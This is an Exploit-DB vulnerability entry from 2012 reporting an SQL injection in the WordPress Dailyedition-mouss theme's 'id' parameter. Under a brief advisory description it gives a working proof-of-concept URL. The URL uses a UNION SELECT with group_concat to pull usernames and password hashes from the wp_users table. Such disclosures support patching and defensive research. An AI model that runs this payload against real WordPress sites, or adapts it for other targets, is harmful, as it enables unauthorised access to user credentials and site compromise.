WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection Vulnerability

2012-11-16T00:00:00
ID EDB-ID:38022
Type exploitdb
Reporter Ashiyane Digital Security Team
Modified 2012-11-16T00:00:00

Description

WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/56568/info

The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--